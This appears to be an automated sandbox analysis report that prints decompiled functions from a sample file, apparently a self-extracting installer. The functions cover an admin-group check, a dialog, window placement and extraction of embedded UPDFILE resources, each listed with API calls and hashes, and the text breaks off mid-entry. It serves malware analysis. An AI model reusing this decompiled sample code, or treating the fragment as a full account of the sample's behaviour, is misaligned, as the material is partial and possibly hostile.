                                                                                                                                                                                                                                                Function 001017EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                                			E001017EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x10a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00106CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}



















                                                                                                                                                                                                                                                0x001017f6
                                                                                                                                                                                                                                                0x001017fd
                                                                                                                                                                                                                                                0x00101805
                                                                                                                                                                                                                                                0x0010180b
                                                                                                                                                                                                                                                0x0010180d
                                                                                                                                                                                                                                                0x00101815
                                                                                                                                                                                                                                                0x00101818
                                                                                                                                                                                                                                                0x00101820
                                                                                                                                                                                                                                                0x00101824
                                                                                                                                                                                                                                                0x0010182c
                                                                                                                                                                                                                                                0x00101832
                                                                                                                                                                                                                                                0x00101837
                                                                                                                                                                                                                                                0x00101851
                                                                                                                                                                                                                                                0x00101854
                                                                                                                                                                                                                                                0x0010185d
                                                                                                                                                                                                                                                0x00101862
                                                                                                                                                                                                                                                0x0010186c
                                                                                                                                                                                                                                                0x00101872
                                                                                                                                                                                                                                                0x00101877
                                                                                                                                                                                                                                                0x0010187e
                                                                                                                                                                                                                                                0x0010187e
                                                                                                                                                                                                                                                0x00101883
                                                                                                                                                                                                                                                0x00101883
                                                                                                                                                                                                                                                0x0010185d
                                                                                                                                                                                                                                                0x0010188a
                                                                                                                                                                                                                                                0x0010188a
                                                                                                                                                                                                                                                0x001018a2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001018DD), ref: 0010181A
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0010182C
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(001018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001018DD), ref: 00101855
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?,?,?,?,001018DD), ref: 00101883
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,001018DD), ref: 0010188A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                • Opcode ID: 8d352828195a3166c1b85f796c6bb9f1cd8d7bceaf65962081a3d48de902e33d
                                                                                                                                                                                                                                                • Instruction ID: 28321ac8fb3e080bcf2f159a1247c7bc47a77e83b6eebe478e410a50e88fc2ac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d352828195a3166c1b85f796c6bb9f1cd8d7bceaf65962081a3d48de902e33d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63118671E00309BFDB149FA4EC49ABEBB78EF44701F50416AFA85E3290DBB49D458B91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00103450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00103450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E001043D0(_t24, _t12);
					SetWindowTextA(_t24, "lenta");
					SetDlgItemTextA(_t24, 0x838,  *0x109404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x1091dc = 1;
					goto L8;
				}
				return 0;
			}








                                                                                                                                                                                                                                                0x00103459
                                                                                                                                                                                                                                                0x0010345c
                                                                                                                                                                                                                                                0x001034d8
                                                                                                                                                                                                                                                0x001034de
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001034e0
                                                                                                                                                                                                                                                0x0010345e
                                                                                                                                                                                                                                                0x00103463
                                                                                                                                                                                                                                                0x0010349a
                                                                                                                                                                                                                                                0x001034a0
                                                                                                                                                                                                                                                0x001034a7
                                                                                                                                                                                                                                                0x001034b2
                                                                                                                                                                                                                                                0x001034c4
                                                                                                                                                                                                                                                0x001034cb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001034cb
                                                                                                                                                                                                                                                0x00103468
                                                                                                                                                                                                                                                0x0010346e
                                                                                                                                                                                                                                                0x00103474
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010347c
                                                                                                                                                                                                                                                0x0010348c
                                                                                                                                                                                                                                                0x00103490
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103496
                                                                                                                                                                                                                                                0x00103484
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103486
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103486
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00103490
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0010349A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 001034B2
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000838), ref: 001034C4
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 001034CB
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 001034D8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                                • Opcode ID: a3633865a0c7b967401ad77a0ecee355fe2299dc680f3d17ab6dc61c873f6e83
                                                                                                                                                                                                                                                • Instruction ID: eafb7417ac6be31bad284a28bff1d83cd0554eb7aaeb080ca294f6a63f200aa1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3633865a0c7b967401ad77a0ecee355fe2299dc680f3d17ab6dc61c873f6e83
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63017131240214ABD71A6F65DC1C96D3A69EF49711F504010FAE6CE9E1CBF19F81DBD1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00102AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E00102AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x108004; // 0xb5a2e1bc
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x109a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00101680(_t65, E001017C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E001065E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00101680(_t65, E001017C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00106CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}






















                                                                                                                                                                                                                                                0x00102aac
                                                                                                                                                                                                                                                0x00102ab7
                                                                                                                                                                                                                                                0x00102abc
                                                                                                                                                                                                                                                0x00102abe
                                                                                                                                                                                                                                                0x00102ac3
                                                                                                                                                                                                                                                0x00102ac6
                                                                                                                                                                                                                                                0x00102ac9
                                                                                                                                                                                                                                                0x00102ace
                                                                                                                                                                                                                                                0x00102ae6
                                                                                                                                                                                                                                                0x00102bdc
                                                                                                                                                                                                                                                0x00102bdc
                                                                                                                                                                                                                                                0x00102be0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102af2
                                                                                                                                                                                                                                                0x00102afc
                                                                                                                                                                                                                                                0x00102b00
                                                                                                                                                                                                                                                0x00102b05
                                                                                                                                                                                                                                                0x00102b05
                                                                                                                                                                                                                                                0x00102b0b
                                                                                                                                                                                                                                                0x00102bca
                                                                                                                                                                                                                                                0x00102bd1
                                                                                                                                                                                                                                                0x00102b11
                                                                                                                                                                                                                                                0x00102b18
                                                                                                                                                                                                                                                0x00102b26
                                                                                                                                                                                                                                                0x00102b99
                                                                                                                                                                                                                                                0x00102bc8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102b9b
                                                                                                                                                                                                                                                0x00102bae
                                                                                                                                                                                                                                                0x00102bb3
                                                                                                                                                                                                                                                0x00102bb5
                                                                                                                                                                                                                                                0x00102bb5
                                                                                                                                                                                                                                                0x00102bb8
                                                                                                                                                                                                                                                0x00102bb8
                                                                                                                                                                                                                                                0x00102bba
                                                                                                                                                                                                                                                0x00102bbb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102bb8
                                                                                                                                                                                                                                                0x00102b28
                                                                                                                                                                                                                                                0x00102b2e
                                                                                                                                                                                                                                                0x00102b33
                                                                                                                                                                                                                                                0x00102b39
                                                                                                                                                                                                                                                0x00102b3c
                                                                                                                                                                                                                                                0x00102b3c
                                                                                                                                                                                                                                                0x00102b3e
                                                                                                                                                                                                                                                0x00102b3f
                                                                                                                                                                                                                                                0x00102b55
                                                                                                                                                                                                                                                0x00102b5d
                                                                                                                                                                                                                                                0x00102b64
                                                                                                                                                                                                                                                0x00102b64
                                                                                                                                                                                                                                                0x00102b7a
                                                                                                                                                                                                                                                0x00102b7f
                                                                                                                                                                                                                                                0x00102b81
                                                                                                                                                                                                                                                0x00102b81
                                                                                                                                                                                                                                                0x00102b84
                                                                                                                                                                                                                                                0x00102b84
                                                                                                                                                                                                                                                0x00102b86
                                                                                                                                                                                                                                                0x00102b87
                                                                                                                                                                                                                                                0x00102bbf
                                                                                                                                                                                                                                                0x00102bc1
                                                                                                                                                                                                                                                0x00102bc1
                                                                                                                                                                                                                                                0x00102b26
                                                                                                                                                                                                                                                0x00102bda
                                                                                                                                                                                                                                                0x00102bda
                                                                                                                                                                                                                                                0x00102be6
                                                                                                                                                                                                                                                0x00102be6
                                                                                                                                                                                                                                                0x00102bf8

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00102AE6
                                                                                                                                                                                                                                                • IsDBCSLeadByte.KERNEL32(00000000), ref: 00102AF2
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 00102B12
                                                                                                                                                                                                                                                • CharUpperA.USER32 ref: 00102B1E
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?), ref: 00102B55
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 00102BD4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 571164536-0
                                                                                                                                                                                                                                                • Opcode ID: 104a6c99e2462ef8a2356e3aa16991d1154bcff37da9cfa50c046cd2848399d6
                                                                                                                                                                                                                                                • Instruction ID: 436a6440473f4eb562bf96b50bc8f80a9ed4f8cfef06f6642b0dab262bc46c3c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 104a6c99e2462ef8a2356e3aa16991d1154bcff37da9cfa50c046cd2848399d6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 964127346082459FDF259F348C58AFD7BA99F56310F1440DAE8C293682DFF58E86CBA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001043D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E001043D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00106CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}
























                                                                                                                                                                                                                                                0x001043d0
                                                                                                                                                                                                                                                0x001043d8
                                                                                                                                                                                                                                                0x001043df
                                                                                                                                                                                                                                                0x001043e6
                                                                                                                                                                                                                                                0x001043ec
                                                                                                                                                                                                                                                0x001043f1
                                                                                                                                                                                                                                                0x00104400
                                                                                                                                                                                                                                                0x00104403
                                                                                                                                                                                                                                                0x0010440b
                                                                                                                                                                                                                                                0x00104420
                                                                                                                                                                                                                                                0x00104429
                                                                                                                                                                                                                                                0x00104437
                                                                                                                                                                                                                                                0x00104444
                                                                                                                                                                                                                                                0x00104447
                                                                                                                                                                                                                                                0x0010444d
                                                                                                                                                                                                                                                0x00104454
                                                                                                                                                                                                                                                0x0010445b
                                                                                                                                                                                                                                                0x00104460
                                                                                                                                                                                                                                                0x00104461
                                                                                                                                                                                                                                                0x00104467
                                                                                                                                                                                                                                                0x0010446f
                                                                                                                                                                                                                                                0x00104473
                                                                                                                                                                                                                                                0x00104473
                                                                                                                                                                                                                                                0x00104463
                                                                                                                                                                                                                                                0x00104463
                                                                                                                                                                                                                                                0x00104463
                                                                                                                                                                                                                                                0x0010447a
                                                                                                                                                                                                                                                0x00104481
                                                                                                                                                                                                                                                0x00104484
                                                                                                                                                                                                                                                0x0010448a
                                                                                                                                                                                                                                                0x00104492
                                                                                                                                                                                                                                                0x00104496
                                                                                                                                                                                                                                                0x00104496
                                                                                                                                                                                                                                                0x00104486
                                                                                                                                                                                                                                                0x00104486
                                                                                                                                                                                                                                                0x00104486
                                                                                                                                                                                                                                                0x001044b8

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 001043F1
                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0010440B
                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00104423
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0010442E
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0010443A
                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00104447
                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 001044A2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2212493051-0
                                                                                                                                                                                                                                                • Opcode ID: 6ed3530bebf1205e2110b57e7edddbb26acb6841c45914a4b6e5ef4a4f285179
                                                                                                                                                                                                                                                • Instruction ID: b8ad62693eb192f68b85d4c704a9183c2afb9b6c1156a442431fc3bd588b7fc0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ed3530bebf1205e2110b57e7edddbb26acb6841c45914a4b6e5ef4a4f285179
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC314D72E00219AFCB14CFB8DD889EEBBB5EF89310F554169F945F3280DAB06C458B60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00106298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 53%
                                                                                                                                                                                                                                                			E00106298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0010171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x109124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x10a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0010171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00106CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}






















                                                                                                                                                                                                                                                0x00106298
                                                                                                                                                                                                                                                0x001062a0
                                                                                                                                                                                                                                                0x001062a7
                                                                                                                                                                                                                                                0x001062ad
                                                                                                                                                                                                                                                0x001062af
                                                                                                                                                                                                                                                0x001062bb
                                                                                                                                                                                                                                                0x001062c3
                                                                                                                                                                                                                                                0x001062c4
                                                                                                                                                                                                                                                0x0010633b
                                                                                                                                                                                                                                                0x0010633b
                                                                                                                                                                                                                                                0x00106345
                                                                                                                                                                                                                                                0x0010634d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001062da
                                                                                                                                                                                                                                                0x001062de
                                                                                                                                                                                                                                                0x0010635f
                                                                                                                                                                                                                                                0x00106369
                                                                                                                                                                                                                                                0x001062e0
                                                                                                                                                                                                                                                0x001062e0
                                                                                                                                                                                                                                                0x001062e0
                                                                                                                                                                                                                                                0x001062e3
                                                                                                                                                                                                                                                0x001062e5
                                                                                                                                                                                                                                                0x001062e5
                                                                                                                                                                                                                                                0x001062e8
                                                                                                                                                                                                                                                0x001062e8
                                                                                                                                                                                                                                                0x001062ea
                                                                                                                                                                                                                                                0x001062eb
                                                                                                                                                                                                                                                0x001062ef
                                                                                                                                                                                                                                                0x001062f1
                                                                                                                                                                                                                                                0x001062f3
                                                                                                                                                                                                                                                0x00106302
                                                                                                                                                                                                                                                0x00106308
                                                                                                                                                                                                                                                0x0010630d
                                                                                                                                                                                                                                                0x00106314
                                                                                                                                                                                                                                                0x00106314
                                                                                                                                                                                                                                                0x00106316
                                                                                                                                                                                                                                                0x00106319
                                                                                                                                                                                                                                                0x00106355
                                                                                                                                                                                                                                                0x00106357
                                                                                                                                                                                                                                                0x0010631b
                                                                                                                                                                                                                                                0x0010631b
                                                                                                                                                                                                                                                0x00106331
                                                                                                                                                                                                                                                0x00106334
                                                                                                                                                                                                                                                0x00106339
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106339
                                                                                                                                                                                                                                                0x00106319
                                                                                                                                                                                                                                                0x0010636b
                                                                                                                                                                                                                                                0x0010637d
                                                                                                                                                                                                                                                0x0010637d
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010171E: _vsnprintf.MSVCRT ref: 00101750
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,001051CA,00000004,00000024,00102F71,?,00000002,00000000), ref: 001062CD
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,001051CA,00000004,00000024,00102F71,?,00000002,00000000), ref: 001062D4
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001051CA,00000004,00000024,00102F71,?,00000002,00000000), ref: 0010631B
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00106345
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001051CA,00000004,00000024,00102F71,?,00000002,00000000), ref: 00106357
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
